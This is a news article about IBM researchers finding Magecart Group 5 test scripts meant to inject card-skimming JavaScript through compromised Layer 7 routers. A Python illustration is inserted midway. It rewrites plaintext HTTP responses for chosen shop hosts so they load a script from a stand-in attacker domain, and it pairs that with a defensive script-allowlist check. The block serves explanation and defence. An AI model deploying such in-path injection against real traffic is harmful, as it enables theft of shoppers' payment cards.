Hackers looking into injecting card-stealing code on routers, rather than websites


Security researchers at IBM have found evidence that hackers have been working on creating malicious scripts they can deploy on commercial-grade “Layer 7” routers to steal payment card details.

This discovery is a game-changer in what researchers call Magecart attacks, also known as web skimming. These are attacks where hackers plant malicious code on an online store that records and steals payment card details.

Until now, Magecart code has been delivered at the website level, hidden inside JavaScript or PHP files on a compromised store. This discovery marks an escalation: the malicious code is injected at the router level, into traffic passing through the device, rather than planted on an outdated or poorly secured website.

What are L7 routers

Layer 7, or L7, routers are a type of commercial, heavy-duty router that’s usually installed on large networks, such as hotels, malls, airports, casinos, government networks, public spaces, and others.

They work like any other router, with the added capability of inspecting and manipulating traffic at the seventh layer (the application layer) of the OSI networking model. That means they can react to traffic based on more than IP addresses and ports: cookies, domain names, browser types, and other application-level fields.

In a report published today, researchers with the IBM X-Force Incident Response and Intelligence Services (IRIS) team said they found evidence that a well-known hacker group has been testing Magecart scripts to deploy on L7 routers.

The idea is that hackers would compromise L7 routers and then use their traffic manipulation features to inject these malicious scripts into users’ active browser sessions as pages pass through the device.

IBM IRIS researchers said the scripts they found were specifically designed to extract payment card data from online shops, and upload the stolen information to a remote web server.
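The mechanics described above, as an added illustration that is not IBM's analysis or the attackers' code: an in-path device with application-layer visibility matches on the Host header and Content-Type of a plaintext HTTP response (fields an L3/L4 router never looks at) and splices an extra script tag into the page before it reaches the browser. The same block includes the check a site owner would want, listing external script hosts on a page that are not on the shop's allowlist. The hostnames, paths and HTML are constructed for the example; the "analytics" domain stands in for any attacker-controlled host.

```python
"""
Added illustration of router-level (L7) script injection and a defender-side
allowlist check. Not IBM's or the attackers' code. Every hostname, path and
the sample HTML below is constructed for the example.
"""
import re
from urllib.parse import urlparse

# Hypothetical L7 policy: only rewrite HTML responses for these shop hosts.
TARGET_HOSTS = {"shop.example", "www.shop.example"}
# Hypothetical attacker-controlled script location.
INJECTED_TAG = '<script src="https://cdn-stats.example/js/analytics.js"></script>'


def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def build_http_response(status: str, headers: dict, body: bytes) -> bytes:
    """Serialise a response, recomputing Content-Length for the (possibly new) body."""
    headers = dict(headers)
    headers["content-length"] = str(len(body))
    head = status + "\r\n" + "\r\n".join(f"{k}: {v}" for k, v in headers.items())
    return head.encode("iso-8859-1") + b"\r\n\r\n" + body


def l7_inject(request_host: str, scheme: str, raw_response: bytes) -> bytes:
    """
    What a compromised L7 device can do with a response it is able to read:
    decide on application-layer fields (Host, Content-Type) and splice a
    script tag in front of </body>. Returns the response unchanged when the
    policy does not match. Over HTTPS the device sees only ciphertext, so the
    body cannot be rewritten unless TLS is terminated on the device with a
    certificate the browser trusts; that is why the scheme check is here.
    """
    if scheme != "http" or request_host not in TARGET_HOSTS:
        return raw_response
    status, headers, body = parse_http_response(raw_response)
    if not headers.get("content-type", "").startswith("text/html"):
        return raw_response
    if b"</body>" not in body:
        return raw_response
    body = body.replace(b"</body>", INJECTED_TAG.encode() + b"</body>", 1)
    return build_http_response(status, headers, body)


SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)


def unexpected_script_hosts(html: str, allowed_hosts: set) -> list:
    """
    Defender-side check: external script hosts on a page that are not on the
    shop's allowlist. Run it on the page as a customer actually receives it
    over the network in question, not on the copy stored on the origin server:
    router-level injection never touches the origin.
    """
    found = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            found.append(host)
    return found


# Constructed sample: a plaintext checkout page exactly as the origin serves it.
ORIGIN_BODY = (
    b"<html><body><form id='checkout'>"
    b"<input name='cc_number'><input name='cc_cvv'></form>"
    b"<script src='https://static.shop.example/checkout.js'></script>"
    b"</body></html>"
)
ORIGIN_RESPONSE = build_http_response(
    "HTTP/1.1 200 OK", {"content-type": "text/html; charset=utf-8"}, ORIGIN_BODY
)


def demo() -> dict:
    """Run the injection over plaintext and TLS, then the allowlist check."""
    tampered = l7_inject("shop.example", "http", ORIGIN_RESPONSE)
    untouched = l7_inject("shop.example", "https", ORIGIN_RESPONSE)
    _, _, body = parse_http_response(tampered)
    return {
        "tampered": tampered != ORIGIN_RESPONSE,
        "https_untouched": untouched == ORIGIN_RESPONSE,
        "unexpected_hosts": unexpected_script_hosts(body.decode(), {"static.shop.example"}),
    }


if __name__ == "__main__":
    print(demo())
```

The allowlist check is deliberately run on the body the browser would receive rather than on the origin's files, because that is the only place a router-level injection is visible; a Content-Security-Policy header restricting script-src to the shop's own hosts turns the same allowlist into something the browser enforces on every page load.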

Researchers said they found these scripts after the hackers uploaded the files to VirusTotal, a web-based antivirus aggregator. The hackers appear to have been testing whether their code would be detected by the antivirus engines that make up the VirusTotal service.

In total, IBM IRIS researchers found 17 scripts, which they organized in five groups, based on their purpose.

Image: IBM IRIS

Well-known hacking group behind the “router file tests”

Researchers said that domains and other indicators in the code linked the 17 files to a known threat actor tracked as Magecart Group 5 (Magecart #5).

This is a known threat actor that has engaged in hacking IT companies and planting card-stealing code in their products. They also used CDNs (content delivery networks) and ads to deliver the malicious code.

These types of attacks are called web skimming, or Magecart attacks, and have been going on for at least three years, but they became a popular trend in the past year. A RiskIQ report published last year delved deeper into Magecart attacks.

Yonathan Klijnsma, Head of Threat Research at RiskIQ, said that Magecart group #5 is one of the most sophisticated of all the Magecart groups his company has tracked.

In its 2018 report, RiskIQ identified 12 Magecart groups, but IBM said it’s now tracking 38 such entities.

Unclear if the “test files” are now used in the real world

IBM IRIS researchers said the Magecart group #5 test scripts they found were uploaded on VirusTotal between April 11 and April 14.

It is unclear whether the scripts have been deployed on real-world routers, but it is likely that they have.

IBM IRIS noted that, historically, the Magecart #5 group has been active in stealing payment card data entered in the checkout forms of selected US and Chinese online stores. These may also be the stores they’ll target if they deploy their malicious scripts on routers.

From a user perspective, there is not much a shopper can do to prevent a Magecart attack executed at the router level, other than avoiding online shopping from untrusted or public networks, such as those in hotels, airports, or malls. One caveat: an in-path device can only rewrite pages it can read, so a store served strictly over HTTPS is out of its reach unless the attacker also terminates or breaks TLS on the device; plaintext HTTP pages and any resources a store still loads over HTTP are the exposed surface.

However, when shopping from home, users are still exposed to Magecart attacks that rely on inserting malicious code at the website level.

But there may be one solution. In recent months, responding to the rise in Magecart (web skimming) attacks, security researchers have begun recommending using a “virtual card” service, where users get a one-time payment card number they can use for one transaction only.

Even if the card number is used on a compromised site, once the transaction is completed, the card number becomes useless for hackers afterward. The downside is that “virtual card” services aren’t always available in all countries around the globe, and not all users will be able to get one.

Magecart attacks evolving towards injection of malicious code at the router level is not a surprise to most security experts. Insecure routers have been hacked throughout the past decade, usually to redirect users to phishing pages or malicious downloads, to inject cryptojacking scripts, or to inject ads for the criminals’ profit. It was only a matter of time until Magecart groups realized they could do the same, inserting card-stealing code in place of the payloads earlier groups used.

About the author

E-Crypto News was developed to assist all cryptocurrency investors in developing profitable cryptocurrency portfolios through the provision of timely and much-needed information. Investments in cryptocurrency require a level of detail, sensitivity, and accuracy that isn’t required in any other market and as such, we’ve developed our databases to help fill in information gaps.
